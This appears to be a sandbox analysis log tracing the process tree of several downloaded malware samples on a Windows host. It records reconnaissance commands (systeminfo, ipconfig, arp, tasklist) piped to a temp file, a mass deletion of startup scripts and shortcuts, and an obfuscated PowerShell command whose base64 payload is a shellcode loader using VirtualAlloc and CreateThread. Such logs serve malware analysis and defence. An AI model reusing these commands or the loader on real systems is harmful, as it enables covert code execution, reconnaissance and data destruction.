  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2812 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5736 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5436 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:2012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5820 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5640 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4008
- C:\Users\Admin\Downloads\NGVkZTM3 (1).exe
  "C:\Users\Admin\Downloads\NGVkZTM3 (1).exe"
  2⤵
  - Executes dropped EXE
  PID:3952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5836 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5432 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:5104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5912 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5348 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:388
- C:\Users\Admin\Downloads\Y2Q0MzM1 (1).exe
  "C:\Users\Admin\Downloads\Y2Q0MzM1 (1).exe"
  2⤵
  - Executes dropped EXE
  PID:2588
- - C:\Users\Admin\Downloads\Y2Q0MzM1 (1).exe
    "C:\Users\Admin\Downloads\Y2Q0MzM1 (1).exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:4820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe dir %appdata%/*.bat>>%temp%/out.txt"
      4⤵
      PID:1292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe dir C:\Users\Admin\AppData\Roaming/*.bat
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe tasklist>>%temp%/out.txt"
      4⤵
      PID:4168
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe tasklist
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4816
      - C:\Windows\system32\tasklist.exe
        
        "C:\Windows\system32\tasklist.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:4760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe dir "%appdata%/Microsoft/Windows/Start Menu/Programs/Startup">>%temp%/out.txt"
      4⤵
      PID:5060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe dir "C:\Users\Admin\AppData\Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe dir "%allusersprofile%/Microsoft/Windows/StartMenu/Programs/Startup">>%temp%/out.txt"
      4⤵
      PID:4852
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe dir "C:\ProgramData/Microsoft/Windows/StartMenu/Programs/Startup"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe systeminfo>>%temp%/out.txt"
      4⤵
      PID:4888
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe systeminfo
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1968
      - C:\Windows\system32\systeminfo.exe
        
        "C:\Windows\system32\systeminfo.exe"
        6⤵
        Gathers system information
        
        PID:3396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe route print>>%temp%/out.txt"
      4⤵
      PID:3428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe route print
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1508
      - C:\Windows\system32\ROUTE.EXE
        
        "C:\Windows\system32\ROUTE.EXE" print
        6⤵
        
        PID:4168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe ipconfig /all>>%temp%/out.txt"
      4⤵
      PID:184
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe ipconfig /all
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4068
      - C:\Windows\system32\ipconfig.exe
        
        "C:\Windows\system32\ipconfig.exe" /all
        6⤵
        Gathers network information
        
        PID:1052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe arp -a>>%temp%/out.txt"
      4⤵
      PID:5036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe arp -a
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4720
      - C:\Windows\system32\ARP.EXE
        
        "C:\Windows\system32\ARP.EXE" -a
        6⤵
        
        PID:4620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe dir %appdata%/Microsoft/Windows/Recent>>%temp%/out.txt"
      4⤵
      PID:5072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe dir C:\Users\Admin\AppData\Roaming/Microsoft/Windows/Recent
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1548
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe wmic startup >> %temp%/out.txt"
      4⤵
      PID:5104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe wmic startup
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4072
      - C:\Windows\System32\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" startup
        6⤵
        
        PID:1772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe cmd.exe /c del /"%appdata%//Microsoft//Windows//StartMenu//Programs//Startup//*.VBS/" /"%appdata%//*.CMD/"/"%appdata%//*.BAT/" /"%appdata%//*01/"/"%appdata%//Microsoft//Windows//StartMenu//Programs//Startup//*.lnk/"/"%allusersprofile%//Microsoft//Windows//StartMenu//Programs//Startup//*.lnk/" /F /Q"
      4⤵
      PID:644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe cmd.exe /c del /"C:\Users\Admin\AppData\Roaming//Microsoft//Windows//StartMenu//Programs//Startup//*.VBS/" /"C:\Users\Admin\AppData\Roaming//*.CMD/"/"C:\Users\Admin\AppData\Roaming//*.BAT/" /"C:\Users\Admin\AppData\Roaming//*01/"/"C:\Users\Admin\AppData\Roaming//Microsoft//Windows//StartMenu//Programs//Startup//*.lnk/"/"C:\ProgramData//Microsoft//Windows//StartMenu//Programs//Startup//*.lnk/" /F /Q
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3272
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /C:\Users\Admin\AppData\Roaming//Microsoft//Windows//StartMenu//Programs//Startup//*.VBS/ /C:\Users\Admin\AppData\Roaming//*.CMD//C:\Users\Admin\AppData\Roaming//*.BAT/ /C:\Users\Admin\AppData\Roaming//*01//C:\Users\Admin\AppData\Roaming//Microsoft//Windows//StartMenu//Programs//Startup//*.lnk//C:\ProgramData//Microsoft//Windows//StartMenu//Programs//Startup//*.lnk/ /F /Q
        6⤵
        
        PID:2184
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tar -xvf C:\Users\Admin\AppData\Local\Temp\capture.tar -C C:\Users\Admin\AppData\Local\Temp\"
      4⤵
      PID:3396
    - - C:\Windows\system32\tar.exe
        
        tar -xvf C:\Users\Admin\AppData\Local\Temp\capture.tar -C C:\Users\Admin\AppData\Local\Temp\
        5⤵
        
        PID:3588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5396 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5816 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5696 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6128 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3232
- C:\Users\Admin\Downloads\ODU0ZjFk.exe
  "C:\Users\Admin\Downloads\ODU0ZjFk.exe"
  2⤵
  - Executes dropped EXE
  PID:2880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6000 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5996 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:4100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6056 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:3192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6052 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1236
- C:\Users\Admin\Downloads\NWQ4NTA4.exe
  "C:\Users\Admin\Downloads\NWQ4NTA4.exe"
  2⤵
  - Executes dropped EXE
  PID:3892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 --field-trial-handle=1816,i,8678673026968587994,4936245398786248174,131072 /prefetch:8
  2⤵
  PID:1936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\c1228d61b8c455d7a9cedc12a8279c05b92c944afd78b86a18c20c0c863b2e91.bat" "
  2⤵
  PID:1484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 -C "sv kr -;sv TM ec;sv NC ((gv kr).value.toString()+(gv TM).value.toString());powershell (gv NC).value.toString() 'JABhAE8AcgBjACAAPQAgACcAJABOAEUAQwBFACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAE4ARQBDAEUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBiACwAMAB4AGUAZAAsADAAeAAzAGEALAAwAHgAMgBmACwAMAB4ADAAZAAsADAAeABkAGEALAAwAHgAZAA4ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA1AGUALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeABiADMALAAwAHgAMwA0ACwAMAB4AGMAZAAsADAAeABmADgALAAwAHgAYgA3ACwAMAB4AGEAMQAsADAAeAA5AGUALAAwAHgAMAAzACwAMAB4ADQANwAsADAAeAAzADIALAAwAHgAYwAxACwAMAB4ADgAYQAsADAAeABhADIALAAwAHgAMAAzACwAMAB4AGQAMwAsADAAeABlADkALAAwAHgAYQA3ACwAMAB4ADMANgAsADAAeABlADMALAAwAHgANwBhACwAMAB4AGUANQAsADAAeABiAGEALAAwAHgAOAA4ACwAMAB4ADIAZgAsADAAeAAxAGQALAAwAHgAZgAyACwAMAB4ADcAMQAsADAAeABjADAALAAwAHgAYQBhACwAMAB4AGIAZQAsADAAeABhAGIALAAwAHgANQA0ACwAMAB4AGEANgAsADAAeAAxADYALAAwAHgAOAA1ACwAMAB4AGEAYQAsADAAeABlAGEALAAwAHgANQBiACwAMAB4ADgANAAsADAAeAA1ADYALAAwAHgAZgAwACwAMAB4ADgAZgAsADAAeAA2ADYALAAwAHgANgA2ACwAMAB4ADMAYgAsADAAeABjADIALAAwAHgANgA3ACwAMAB4AGEAZgAsADAAeAA4AGEALAAwAHgAYQA4ACwAMAB4ADgAOAAsADAAeAA3AGQALAAwAHgAOAA3ACwAMAB4ADAAMQAsADAAeAA0ADcALAAwAHgAZAA1ACwAMAB4ADEAYwAsADAAeABlADcALAAwAHgANQBiACwAMAB4AGQAOAAsADAAeABmADIALAAwAHgANgAzACwAMAB4AGUAMwAsADAAeABhADIALAAwAHgANwA3ACwAMAB4AGIAMwAsADAAeAA5ADAALAAwAHgAMQBlACwAMAB4ADcANgAsADAAeABlADQALAAwAHgAZAAyACwAMAB4AGMANwAsADAAeAA1ADgALAAwAHgANQA0ACwAMAB4AGUANAAsADAAeAAyADQALAAwAHgAMQAzACwAMAB4ADEAYwAsADAAeABmAGUALAAwAHgANABmACwAMAB4AGUAYQAsADAAeABlADkALAAwAHgAYwAyACwAMAB4ADcAZQAsADAAeAAxADMALAAwAHgANQA4ACwAMAB4AGIAMAAsADAAeABiADUALAAwAHgANgAwACwAMAB4ADUAYQAsADAAeAAxADAALAAwAHgAOAA0ACwAMAB4AGIANgAsADAAeABmADEALAAwAHgANQBkACwAMAB4ADIAOAAsADAAeAAzAGIALAAwAHgAMABiACwAMAB4ADkAOQAsADAAeAA4AGYALAAwAHgAYQAzACwAMAB4ADcAZQAsADAAeABkADEALAAwAHgAZgAzACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMgAyACwAMAB4ADgAOQAsADAAeAA4ADQALAAwAHgAMABjACwAMAB4AGIANQAsADAAeAAyADkALAAwAHgANABmACwAMAB4AGIANgAsADAAeAAxADEALAAwAHgAYwBiACwAMAB4ADkAYwAsADAAeAAyADEALAAwAHgAZAAxACwAMAB4AGMANwAsADAAeAA2ADkALAAwAHgAMgA1ACwAMAB4AGIAZAAsADAAeABjAGIALAAwAHgANgBjACwAMAB4AGUAYQAsADAAeABiADUALAAwAHgAZgAwACwAMAB4AGUANQAsADAAeAAwAGQALAAwAHgAMQBhACwAMAB4ADcAMQAsADAAeABiAGQALAAwAHgAMgA5ACwAMAB4AGIAZQAsADAAeABkADkALAAwAHgANgA2ACwAMAB4ADUAMwAsADAAeABlADcALAAwAHgAOAA3ACwAMAB4AGMAOQAsADAAeAA2AGMALAAwAHgAZgA3ACwAMAB4ADYAMAAsADAAeABiADYALAAwAHgAYwA4ACwAMAB4ADcAMwAsADAAeAA4ADIALAAwAHgAYQAxACwAMAB4ADYAZAAsADAAeAA3AGMALAAwAHgANQBjACwAMAB4AGMAZQAsADAAeAAzADMALAAwAHgAZQBiACwAMAB4ADkAMAAsADAAeAAwADIALAAwAHgAYwBjACwAMAB4AGUAYgAsADAAeABiAGUALAAwAHgAMQA1ACwAMAB4AGIAZgAsADAAeABkADkALAAwAHgANgAxACwAMAB4ADgAZAAsADAAeAA1ADcALAAwAHgANQAyACwAMAB4AGUAOQAsADAAeAAwAGIALAAwAHgAYQBmACwAMAB4AGUAMwAsADAAeABmAGQALAAwAHgAYQBjACwAMAB4ADcAZgAsADAAeAA0AGIALAAwAHgANgBkACwAMAB4ADUAMwAsADAAeAA4ADAALAAwAHgAYQBjACwAMAB4AGEANwAsADAAeAA5ADcALAAwAHgAZAA0ACwAMAB4AGYAYwAsADAAeABkAGYALAAwAHgAMwBlACwAMAB4ADUANQAsADAAeAA5ADcALAAwAHgAMQBmACwAMAB4AGIAZgAsADAAeAA4ADAALAAwAHgAMAAyACwAMAB4ADIAYQAsADAAeAA1ADcALAAwAHgANgA0ACwAMAB4ADUAYQAsADAAeABlADUALAAwAHgAMQA0ACwAMAB4ADEAMgAsADAAeAA1AGUALAAwAHgAZgBhACwAMAB4ADUAYgAsADAAeAA1ADgALAAwAHgAZAA3ACwAMAB4ADEAYwAsADAAeAAwAGIALAAwAHgAYwBlACwAMAB4AGIAOAAsADAAeABiADAALAAwAHgAZQBiACwAMAB4AGIAZQAsADAAeAA3ADgALAAwAHgANgAxACwAMAB4ADgAMwAsADAAeABkADQALAAwAHgANwA2ACwAMAB4ADUAZQAsADAAeABiADMALAAwAHgAZAA2ACwAMAB4ADUAYwAsADAAeABmADcALAAwAHgANQA5ACwAMAB4ADMAOQAsADAAeAAwADkALAAwAHgAYQBmACwAMAB4AGYANQAsADAAeABhADAALAAwAHgAMQAwACwAMAB4ADMAYgAsADAAeAA2ADQALAAwAHgAMgBjACwAMAB4ADgAZgAsADAAeAA0ADEALAAwAHgAYQA2ACwAMAB4AGEANgAsADAAeAAzAGMALAAwAHgAYgA1ACwAMAB4ADYAOAAsADAAeAA0AGYALAAwAHgANAA4ACwAMAB4AGEANQAsADAAeAAxAGMALAAwAHgAYgBmACwAMAB4ADAANwAsADAAeAA5ADcALAAwAHgAOABhACwAMAB4AGMAMAAsADAAeABiAGQALAAwAHgAYgAyACwAMAB4ADMAMgAsADAAeAA1ADUALAAwAHgAMwBhACwAMAB4ADEANQAsADAAeAA2ADUALAAwAHgAYwAxACwAMAB4ADQAMAAsADAAeAA0ADAALAAwAHgANAAxACwAMAB4ADQAZQAsADAAeABiAGEALAAwAHgAYQA3ACwAMAB4AGQAYQAsADAAeAA0ADcALAAwAHgAMgBlACwAMAB4ADAAOAAsADAAeABiADQALAAwAHgAYQA3ACwAMAB4AGIAZQAsADAAeAA4ADgALAAwAHgANAA0ACwAMAB4AGYAZQAsADAAeABkADQALAAwAHgAOAA4ACwAMAB4ADIAYwAsADAAeABhADYALAAwAHgAOABjACwAMAB4AGQAYQAsADAAeAA0ADkALAAwAHgAYQA5ACwAMAB4ADEAOAAsADAAeAA0AGYALAAwAHgAYwAyACwAMAB4ADMAYwAsADAAeABhADMALAAwAHgAMgA2ACwAMAB4AGIANwAsADAAeAA5ADcALAAwAHgAYwBiACwAMAB4AGMANAAsADAAeABlAGUALAAwAHgAZAAwACwAMAB4ADUAMwAsADAAeAAzADYALAAwAHgAYwA1ACwAMAB4AGUAMAAsADAAeABhADgALAAwAHgAZQAxACwAMAB4ADIAMwAsADAAeAA5ADcALAAwAHgAYwAwACwAMAB4ADMAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAYgBXAGgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGIAVwBoAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABiAFcAaAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGEATwByAGMAKQApADsAJABtAFYAbAAgAD0AIAAiAC0AZQBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABXAHgAdgBxACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFcAeAB2AHEAIAAkAG0AVgBsACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAG0AVgBsACAAJABlACIAOwB9AA=='"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
